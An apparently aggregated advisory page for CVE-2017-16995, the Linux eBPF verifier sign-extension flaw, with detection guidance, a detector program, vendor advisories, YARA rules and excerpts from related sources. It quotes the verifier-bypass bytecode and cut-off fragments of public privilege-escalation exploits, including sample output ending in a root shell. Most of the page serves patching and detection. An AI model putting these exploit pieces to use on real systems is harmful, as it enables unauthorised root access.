CVE-2017-16995
Published 2017-12-27
Priority P259 · high · CVSS 3.1 base score 7.8
Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit code exists (see the Exploit-DB and Metasploit entries below)
EPSS: 30.05% (98.0th percentile)
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
Affected
7 distinct ranges (duplicate rows collapsed)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | linux | < 4.14.7-1 (bookworm) | 4.14.7-1 |
| linux | linux_kernel | >= 0 < 4.14.7-1 | 4.14.7-1 |
| linux | linux_kernel | >= 0 < 4.4.0-119.143 | 4.4.0-119.143 |
| linux | linux_kernel | >= 4.10 < 4.14.9 | 4.14.9 |
| linux | linux_kernel | >= 4.9 < 4.9.72 | 4.9.72 |
The "Fixed in" values mix upstream stable releases (4.9.72, 4.14.9) with distribution package versions (4.14.7-1 is Debian's package, 4.4.0-119.143 is Ubuntu's), so compare against the advisory for your distribution rather than the upstream version string alone.
Detection & IOCs (extracted from sources)
bytes
\xb4\x09\x00\x00\xff\xff\xff\xff\x55\x09\x02\x00\xff\xff\xff\xff\xb7\x00\x00\x00\x00\x00\x00\x00\x95\x00\x00\x00\x00\x00\x00\x00
- Check whether kernel.unprivileged_bpf_disabled is 0 (unprivileged bpf(2) permitted); this is a prerequisite for exploitation of CVE-2017-16995.
- Monitor for unprivileged processes calling bpf() (__NR_bpf) with BPF_PROG_LOAD and prog_type BPF_PROG_TYPE_SOCKET_FILTER, the mechanism the public exploits use to load the malicious program. Legitimate unprivileged socket-filter loads exist, so correlate with the indicators below rather than alerting on the syscall alone.
- Alert on setsockopt() with SO_ATTACH_BPF from unprivileged processes; the exploits use it to attach the loaded program to a socket so that it runs.
- Detect the BPF_DISABLE_VERIFIER pattern, which is what the bytes above encode: a 32-bit MOV of 0xFFFFFFFF into a register (here r9), a JNE of that register against 0xFFFFFFFF that skips two instructions, then MOV r0, 0 and EXIT. The pre-fix check_alu_op sign-extended the 32-bit immediate, so the verifier believed r9 held -1, concluded the JNE could never be taken, and only checked the fall-through MOV/EXIT. At run time a 32-bit MOV zero-extends, r9 holds 0x00000000FFFFFFFF, the jump is taken, and execution continues in instructions the verifier never examined.
- Monitor for reads of the kernel version (uname -r) or of /proc/sys/kernel/unprivileged_bpf_disabled followed by bpf() activity from the same process; this sequence can indicate pre-exploitation reconnaissance. Writing the sysctl requires root, so a write is a hardening event rather than an attacker indicator.
- Flag the constant 0xffff880000000000 (PHYS_OFFSET in both public exploits; the x86_64 direct-map base when it is not randomized) in BPF programs or exploit binaries; the exploits compare leaked kernel pointers against it to validate the leak.
- Credential patching: exploit 44298 reads task_struct->cred at CRED_OFFSET (0x5f8), zeroes the uid/gid fields at credptr+UID_OFFSET (offset 4) through the arbitrary write, then execve()s /bin/bash or /bin/sh. These offsets are specific to the kernel build the exploit targets, so detect on the behaviour (an unprivileged process that loads a socket filter and then spawns a uid 0 shell) rather than on the constants.
- Vulnerable kernel range stated by the sources is 4.0 through 4.14.11 (exclusive). The fix versions on this page are 4.14.8/4.14.9 upstream and 4.9.72 for the 4.9 stable series; distribution packages (Debian 4.14.7-1, Ubuntu 4.4.0-119.143) carry the fix as a backport, so their version numbers sit below the upstream fix version. Systems in this range with BPF support enabled should be prioritized for patching or mitigation, and patched state should be confirmed from the distribution's package changelog rather than the upstream version string.
- Exploitation requires unprivileged BPF loading to be permitted. Setting kernel.unprivileged_bpf_disabled=1 prevents exploitation entirely; once set to 1 the value cannot be changed back without a reboot, and it also blocks legitimate unprivileged eBPF users.
- The public exploits only target x86_64 (they hard-code the x86_64 direct-map base and structure offsets). The verifier bug itself is architecture-independent, and Ubuntu shipped the fix for its Raspberry Pi 2 (ARM) kernel as well, so other architectures with eBPF enabled should not be assumed safe.
- The public exploit's header states that the vulnerability is not exploitable on authentic grsecurity kernels and that only counterfeit/KSPP-patched kernels are affected by it; that claim is the exploit author's, not a vendor statement.
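Added example (not code from any source on this page): a C program that decodes the 32-byte instruction sequence above, shows the pre-fix verifier's view of the 32-bit MOV next to the value the program actually holds at run time, and flags the MOV/JNE pair the way a detector would. The struct layout, opcode encodings and the /proc/sys path are the upstream ones; the function names, the IOC embedded as a byte array, and the generalization to any immediate with the sign bit set (not only 0xffffffff) are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

/* 8-byte eBPF instruction, same layout as struct bpf_insn in uapi/linux/bpf.h;
 * redeclared so the example builds on any host without kernel headers. */
struct insn {
    uint8_t  code;
    uint8_t  regs;   /* low nibble dst_reg, high nibble src_reg */
    int16_t  off;    /* jump offset in instructions, relative to the next insn */
    int32_t  imm;
};

/* Opcodes as encoded in the eBPF ISA (class | op | source). */
#define OP_MOV32_K 0xb4  /* BPF_ALU | BPF_MOV | BPF_K: 32-bit move, zero-extends at run time */
#define OP_JNE_K   0x55  /* BPF_JMP | BPF_JNE | BPF_K */

/* The 32-byte IOC from the list above, embedded here as a constant. */
static const uint8_t IOC[] = {
    0xb4, 0x09, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,   /* mov32 r9, 0xffffffff */
    0x55, 0x09, 0x02, 0x00, 0xff, 0xff, 0xff, 0xff,   /* jne r9, 0xffffffff, +2 */
    0xb7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* mov64 r0, 0 */
    0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* exit */
};

int insn_dst(const struct insn *i) { return i->regs & 0x0f; }

/* Decode little-endian instruction bytes into out[]; returns the count decoded. */
size_t decode_program(const uint8_t *buf, size_t len, struct insn *out, size_t max)
{
    size_t n = 0;
    for (size_t p = 0; p + 8 <= len && n < max; p += 8, n++) {
        out[n].code = buf[p];
        out[n].regs = buf[p + 1];
        out[n].off  = (int16_t)((uint16_t)buf[p + 2] | ((uint16_t)buf[p + 3] << 8));
        out[n].imm  = (int32_t)((uint32_t)buf[p + 4] | ((uint32_t)buf[p + 5] << 8) |
                                ((uint32_t)buf[p + 6] << 16) | ((uint32_t)buf[p + 7] << 24));
    }
    return n;
}

/* Register value the pre-fix check_alu_op() recorded for a 32-bit MOV_K:
 * it sign-extended imm exactly as it does for the 64-bit form. */
uint64_t verifier_mov32_value(int32_t imm) { return (uint64_t)(int64_t)imm; }

/* Register value the interpreter/JIT actually produces: upper 32 bits cleared. */
uint64_t runtime_mov32_value(int32_t imm) { return (uint64_t)(uint32_t)imm; }

/* JNE_K compares the full 64-bit register against the sign-extended immediate. */
static int jne_taken(uint64_t reg, int32_t imm) { return reg != (uint64_t)(int64_t)imm; }

int verifier_takes_jne(const struct insn *mov, const struct insn *jne)
{ return jne_taken(verifier_mov32_value(mov->imm), jne->imm); }

int runtime_takes_jne(const struct insn *mov, const struct insn *jne)
{ return jne_taken(runtime_mov32_value(mov->imm), jne->imm); }

/* Index of a MOV32_K/JNE_K pair on one register whose immediate has the sign
 * bit set: the verifier believes the jump is never taken and never walks the
 * target, while at run time the branch always goes there. Returns -1 if absent.
 * 0xffffffff is the instance on this page; any negative imm splits the same way. */
int find_verifier_bypass(const struct insn *p, size_t n)
{
    for (size_t i = 0; i + 1 < n; i++) {
        const struct insn *mov = &p[i], *jne = &p[i + 1];
        if (mov->code != OP_MOV32_K || jne->code != OP_JNE_K) continue;
        if (insn_dst(mov) != insn_dst(jne) || mov->imm != jne->imm || mov->imm >= 0) continue;
        if (!verifier_takes_jne(mov, jne) && runtime_takes_jne(mov, jne))
            return (int)i;
    }
    return -1;
}

/* Prerequisite from the mitigation notes: 1 = unprivileged bpf(2) blocked,
 * 0 = exposed, -1 = sysctl not readable (e.g. no CONFIG_BPF_SYSCALL). */
int unprivileged_bpf_disabled(void)
{
    FILE *f = fopen("/proc/sys/kernel/unprivileged_bpf_disabled", "r");
    int v = -1;
    if (f) { if (fscanf(f, "%d", &v) != 1) v = -1; fclose(f); }
    return v;
}

int main(void)
{
    struct insn ins[8];
    size_t n = decode_program(IOC, sizeof IOC, ins, 8);
    int hit = find_verifier_bypass(ins, n);
    printf("decoded %zu instructions; verifier-bypass pattern at index %d\n", n, hit);
    if (hit >= 0) {
        const struct insn *mov = &ins[hit], *jne = &ins[hit + 1];
        printf("r%d: verifier believes 0x%016llx, run time holds 0x%016llx\n", insn_dst(mov),
               (unsigned long long)verifier_mov32_value(mov->imm),
               (unsigned long long)runtime_mov32_value(mov->imm));
        printf("jne +%d taken? verifier=%d run time=%d -> unverified code from insn %d\n",
               jne->off, verifier_takes_jne(mov, jne), runtime_takes_jne(mov, jne),
               hit + 2 + jne->off);
    }
    printf("kernel.unprivileged_bpf_disabled = %d\n", unprivileged_bpf_disabled());
    return 0;
}
```

The two value functions are the whole bug in miniature: the commit message below distinguishes BPF_ALU64|BPF_MOV|BPF_K (sign-extended) from BPF_ALU|BPF_MOV|BPF_K (zero-padded), and the pre-fix verifier applied the first rule to both. The sysctl read at the end is host-dependent and only meaningful on Linux; the decoding and pattern check run anywhere.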
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 7.8 | HIGH | — |
| vendor_debian | — | 7.8 | HIGH | — |
| vendor_redhat | — | 7.8 | HIGH | — |
| vendor_ubuntu | — | 7.8 | HIGH | — |
Ubuntu
Linux kernel (Intel Euclid) vulnerability
vendor_ubuntu · 2018-04-24 · CVE-2017-16995
Summary: The system could be made to crash or run programs as an administrator.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, li
Ubuntu
Linux kernel (Xenial HWE) vulnerabilities
vendor_ubuntu · 2018-04-05 · CVSS 7.8 · CVE-2017-0861 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu · 2018-04-04 · CVSS 7.8 · CVE-2017-0861 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could
Ubuntu
Linux kernel (Raspberry Pi 2) vulnerabilities
vendor_ubuntu · 2018-01-10 · CVSS 7.8 · CVE-2017-16995 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A local attacker could use this to cause a denial
of service (system crash) or possibly execute arbitrary code.
(CVE-2017-17863)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
Alexei Starovoitov discovered that the Berkeley Packet Filter (BPF)
implementation in the Linu
Ubuntu
Linux kernel (HWE) vulnerabilities
vendor_ubuntu · 2018-01-10 · CVSS 7.8 · CVE-2017-16995 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
USN-3523-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu
16.04 LTS.
Jann Horn discovered that microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized memory reads via
sidechannel attacks. This flaw is known as Meltdown. A local attacker could
use this to expose sensitive information, including kernel memory.
(CVE-2017-5754)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A lo
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu · 2018-01-09 · CVSS 7.8 · CVE-2017-16995 [HIGH]
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized memory reads via
sidechannel attacks. This flaw is known as Meltdown. A local attacker could
use this to expose sensitive information, including kernel memory.
(CVE-2017-5754)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A local attacker could use this to cause a denial
of service (system crash) or possibly execute arbitrary code.
(CVE-2017-17863)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux
Red Hat
kernel: memory corruption caused by BPF verifier bugs can allow for arbitrary code execution
vendor_redhat · 2017-12-22 · CVSS 7.8 · CVE-2017-16995 [HIGH] · CWE-787
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
An arbitrary memory r/w access issue was found in the Linux kernel compiled with the eBPF bpf(2) system call (CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation errors in the eBPF verifier module, triggered by user supplied malicious BPF program. An unprivileged user could use this flaw to escalate their privileges on a system. Setting parameter "kernel.unprivileged_bpf_disabled=1" prevents such privilege escalation by restricting access to bpf(2) c
Debian
CVE-2017-16995: linux - The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4...
vendor_debian · 2017 · CVSS 7.8 · CVE-2017-16995 [HIGH]
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
Scope: local
bookworm: resolved (fixed in 4.14.7-1)
bullseye: resolved (fixed in 4.14.7-1)
forky: resolved (fixed in 4.14.7-1)
sid: resolved (fixed in 4.14.7-1)
trixie: resolved (fixed in 4.14.7-1)
GHSA
GHSA-45mv-5p9c-6w7c: The check_alu_op function in kernel/bpf/verifier
ghsa_unreviewed · 2022-05-13 · CVE-2017-16995 [HIGH] · CWE-119
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
OSV
linux-lts-xenial, linux-aws vulnerabilities
osv · 2018-04-05 · CVSS 7.8 [HIGH]
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-08
OSV
linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
osv · 2018-04-04 · CVSS 7.8 · CVE-2017-16995 [HIGH]
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial
OSV
linux-hwe, linux-azure, linux-gcp, linux-oem vulnerabilities
osv · 2018-01-10 · CVSS 7.8 [HIGH]
USN-3523-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu
16.04 LTS.
Jann Horn discovered that microprocessors utilizing speculative execution
and indirect branch prediction may allow unauthorized memory reads via
sidechannel attacks. This flaw is known as Meltdown. A local attacker could
use this to expose sensitive information, including kernel memory.
(CVE-2017-5754)
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel did not properly check the relationship between pointer
values and the BPF stack. A local attacker could use this to cause a denial
o
OSV
CVE-2017-16995: The check_alu_op function in kernel/bpf/verifier
osv · 2017-12-27 · CVSS 7.8 · CVE-2017-16995 [HIGH]
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.4 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.
Kernel
bpf: fix incorrect sign extension in check_alu_op()
kernel_security · 2017-12-18 · CVSS 7.8 · CVE-2017-16995 [HIGH]
Distinguish between
BPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)
and BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);
only perform sign extension in the first case.
Starting with v4.14, this is exploitable by unprivileged users as long as
the unprivileged_bpf_disabled sysctl isn't set.
Debian assigned CVE-2017-16995 for this issue.
v3:
- add CVE number (Ben Hutchings)
Fixes: 484611357c19 ("bpf: allow access into map value arrays")
Signed-off-by: Jann Horn
Acked-by: Edward Cree
Signed-off-by: Alexei Starovoitov
Signed-off-by: Daniel Borkmann
YARA
Linux_Exploit_CVE_2017_16995_0c81a317
yara · CVSS 7.8 · CVE-2017-16995 [HIGH]
rule Linux_Exploit_CVE_2017_16995_0c81a317 {
    meta:
        author = "Elastic Security"
        id = "0c81a317-b296-4cda-839c-a37903e86786"
        fingerprint = "40d192607a7237c41c35d90a48cbcfd95a79c0fe7c8017d41389f15a78d620f5"
        creation_date = "2021-01-12"
        last_modified = "2021-09-16"
        threat_name = "Linux.Exploit.CVE-2017-16995"
        reference_sample = "48d927b4b18a03dfbce54bb5f4518869773737e449301ba2477eb797afbb9972"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        // x86-64: push rbp; mov rbp,rsp; mov [rbp-8],rdi; mov rax,[rbp-8];
        // and rax,0xffffffffffffc000; pop rbp; ret; push rbp; ...
        // (unoptimized build of a helper that masks a pointer down to a 16 KiB boundary)
        $a = { 55 48 89 E5 48 89 7D F8 48 8B 45 F8 48 25 00 C0 FF FF 5D C3 55 48 }
    condition:
        all of them
}
YARA
Linux_Exploit_CVE_2017_16995_82816caa
yara · CVSS 7.8 · CVE-2017-16995 [HIGH]
rule Linux_Exploit_CVE_2017_16995_82816caa {
    meta:
        author = "Elastic Security"
        id = "82816caa-2fff-4b71-9544-443e611aacbf"
        fingerprint = "1a716566946fdd368230c02e2c749b6ce371fa6211be6b3db137af9b117bec87"
        creation_date = "2022-01-05"
        last_modified = "2022-01-26"
        threat_name = "Linux.Exploit.CVE-2017-16995"
        reference_sample = "14e6b788db0db57067d9885ab5ff3d3a5749639549d82abd98fa4fcf27000f34"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { BC 89 45 C0 8B 45 B8 48 98 48 C1 E8 03 89 45 C4 48 8B 45 B0 48 }
    condition:
        all of them
}
YARA
Linux_Exploit_CVE_2017_16995_5edb0181
yara · CVSS 7.8 · CVE-2017-16995 [HIGH]
rule Linux_Exploit_CVE_2017_16995_5edb0181 {
    meta:
        author = "Elastic Security"
        id = "5edb0181-dfb1-47e2-873b-0fa3043bee67"
        fingerprint = "804635a4922830b894ed38f58751f481d389e5bfbea7a50912763952971844e6"
        creation_date = "2022-01-05"
        last_modified = "2022-01-26"
        threat_name = "Linux.Exploit.CVE-2017-16995"
        reference_sample = "e4df84e1dffbad217d07222314a7e13fd74771a9111d07adc467a89d8ba81127"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        license = "Elastic License v2"
        os = "linux"
    strings:
        $a = { F8 2F 77 0F 45 89 C2 49 89 D1 41 83 C0 08 4A 8D 54 15 D0 48 }
    condition:
        all of them
}
Exploit-DB
Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)
exploitdb · 2018-07-19 · CVE-2017-16995
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # (module preamble between the class line and the metadata was lost in extraction)
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linux BPF Sign Extension Local Privilege Escalation',
      'Description' => %q{
        Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
        which contains a vulnerability where it may improperly perform sign
        extension. This can be utilized to escalate privileges.

        The target system must be compiled with BPF support and must not have
        kernel.unprivileged_bpf_disabled set to 1.

        This module has been tested successfully on:

        Debian 9.0 kernel 4.9.0-3-amd64;
        Deepin 15.5 kernel 4.9.0-deepin13-amd64;
        ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
        Fedora 25 kerne
Exploit-DB
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
exploitdb · 2018-07-10 · CVE-2017-16995
/*
 * (exploit header and the first lines of the sample run were lost in extraction)
 * ... ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
*/
/* 15 #include lines follow in the original; the header names were lost in extraction */
char buffer[64];
int sockets[2];
int mapfd, progfd;
int doredact = 0;
#define LOG_BUF_SIZE 65536
#define PHYS_OFFSET 0xffff880000000000
char bpf_log_buf[LOG_BUF_SIZE];
static __u64 ptr_to_u64(void *ptr)
{
retur
Exploit-DB
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
exploitdb · 2018-03-16 · CVE-2017-16995
/* 13 #include lines follow in the original; the header names were lost in extraction */
#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328
int sockets[2];
int mapfd, progfd;
char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff"   /* mov32 r9, 0xffffffff: verifier sign-extends, run time zero-extends */
               "\x55\x09\x02\x00\xff\xff\xff\xff"   /* jne r9, 0xffffffff, +2: never taken for the verifier, always taken at run time */
               "\xb7\x00\x00\x00\x00\x00\x00\x00"   /* mov64 r0, 0: the only path the verifier checks */
               "\x95\x00\x00\x00\x00\x00\x00\x00"   /* exit; everything after this is unverified */
"\x18\x19\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xbf\x91\x00\x00\x00\x00\x00\x00"
"\xbf\xa2\x00\x00\x00\x00\x00\x00"
"\x07\x02\x00\x00\xfc\xff\xff\xff"
"\x62\x0a\xfc\xff\x00\x00\x00\x00"
"\x85\x00\x00\x00\x01\x00\x00\x00"
"\x55\x00\x01\x00\x00\x00\x00\x00"
"\x95\x00\x00\x00\x00\x00\x00\x00"
"\x79\x06\x00\x00\x00\x00\x0
Exploit-DB
Intel Active Management Technology - System Privileges
exploitdb · 2017-05-10 · CVSS 9.8 · CVE-2017-5689 [CRITICAL] (not a CVE-2017-16995 source; listed because it probes port 16995)
---
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-5689 = {
# dork="Server: Intel(R) Active Management Technology" port:"16992",
# ports=[
# 623,
# 664,
# 16992,
# 16993,
# 16994,
# 16995
# ]
# products=[
# Active Management Technology (AMT),
# Intel Standard Manageability (ISM),
# Intel Small Business Technology (SBT)
# ]
# version=[
# 6.x,
# 7.x,
# 8.x,
# 9.x,
# 10.x,
# 11.0,
# 11.5,
# 11.6
# ]
import functools
import requests
import logging
import uuid
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger(__file__)
TIMEOUT = 8
def handle_exception(func):
@functools.wraps(func)
def wrapper(*args, **kwds):
try:
return func(*args, **kwds)
except Exception as err:
log.error
Metasploit
Linux BPF Sign Extension Local Privilege Escalation
metasploit
Linux kernel prior to 4.14.8 contains a vulnerability in the Berkeley Packet Filter (BPF) verifier. The `check_alu_op` function performs incorrect sign extension which allows the verifier to be bypassed, leading to arbitrary kernel read/write. The target system must be compiled with BPF support and permit unprivileged access to BPF with `kernel.unprivileged_bpf_disabled` not set to 1. This module has been tested successfully on: Debian 9.0 kernel 4.9.0-3-amd64; Deepin 15.5 kernel 4.9.0-deepin13-amd64; ElementaryOS 0.4.1 kernel 4.8.0-52-generic; Fedora 24 kernel 4.5.5-300.fc24.x86_64; Fedora 25 kernel 4.8.6-300.fc25.x86_64; Fedora 26 kernel 4.11.8-300.fc26.x86_64; Fedora 27 kernel 4.13.9-300.fc27.x86_64; Gentoo 2.2 kernel 4.5.2-aufs-r; Li
arXiv
Rethinking Tamper-Evident Logging: A High-Performance, Co-Designed Auditing System
arxiv_fulltext · 2025-09-05
Rui Zhao, Muhammad Shoaib, Wajih Ul Hassan (University of Virginia, Charlottesville, USA); Viet Tung Hoang (Florida State University, Tallahassee, USA)
## Abstract
Existing tamper-evident logging systems suffer from high overhead and severe data loss in high-load settings,
yet only provide coarse-grained tamper detection.
Moreover, installing such systems requires
recompiling kernel code. To address these challenges, we present , a high-performance, tamper-evident audit logging system
that supports fine-grained detection of log tampering.
Even better,
arXiv
KernJC: Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
arxiv_fulltext · 2024-09-24
Bonan Ruan, Jiahao Liu, Chuqi Zhang, Zhenkai Liang (National University of Singapore)
## Abstract
Linux kernel vulnerability reproduction is a critical task in system security.
To reproduce a kernel vulnerability, the vulnerable environment and the Proof of Concept (PoC) program are needed.
Most existing research focuses on the generation of PoC, while the construction of environment is overlooked.
However, establishing an effective vulnerable environment to trigger a vulnerability is challenging.
Firstly, it is hard to guarantee that the selected kernel version for reproduction is vulnerable, as the vulner
CTF
medium / README
ctf_writeups · CVSS 9.1 [CRITICAL]
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Bashed / README
ctf_writeups
HTB 8. Bashed
1. `nmap -A -T4 -p- 10.10.10.68` shows port 80 with `Apache httpd 2.4.18 (Ubuntu)`.
2. `searchsploit apache 2.4` reveals local `apache_ctl` exploit.
3. Going to website `10.10.10.68` and looking at content shows that `10.10.10.68/uploads`. exists.
4. `dirbuster` time with medium wordlist which reveals several folders.
5. View source code of pages shows nothing.
6. `dirbuster` found `dev/phpbash.php`.
7. Go to `10.10.10.68` and launch `phpbash.php` which launches web terminal.
8. `whoami` is `www-data` so lets get the user flag. `cat /home/arrexel/user.txt`.
9. test `sudo -l` and `history` which shows we can become `scriptmanager` user without password.
10. Can't change to `scriptmanager` because we are in a webshell without a tty.
11. `cd /var/www/html/uploads/` and upload p
CTF
README
ctf_writeups · CVSS 9.8 [CRITICAL]
# Boot to root CTFs
Walkthroughs and notes of 'boot to root' CTFs mostly from VulnHub that I did for fun. I like to use vulnerable VMs from VulnHub (in addition to the ones I create) to organize hands-on penetration testing training sessions for junior security auditors/consultants :-)
### >> Classic pentest methodology to do a Boot2root CTF upload a Webshell)
➤ Clear-text passwords stored in 'public' website pages, configuration files, log files
➤ ...
2. Exploiting unpatched known vulnerabilities
➤ Web server (e.g. Apache Struts RCE: CVE-2017-12611/CVE-2017-9805/CVE-2017-9791, JBoss Java Deserialization RCE)
➤ Bash & web server CGI (e.g. Shellshock RCE CVE-2014-6271/CVE-2014-7169)
➤ Web CMS (e.g. Drupalgeddon2 RCE CVE-2018-7600)
➤ Web framework (e.g. PHP CGI RCE CVE-2012-1823)
➤ FTP s
Bugzilla
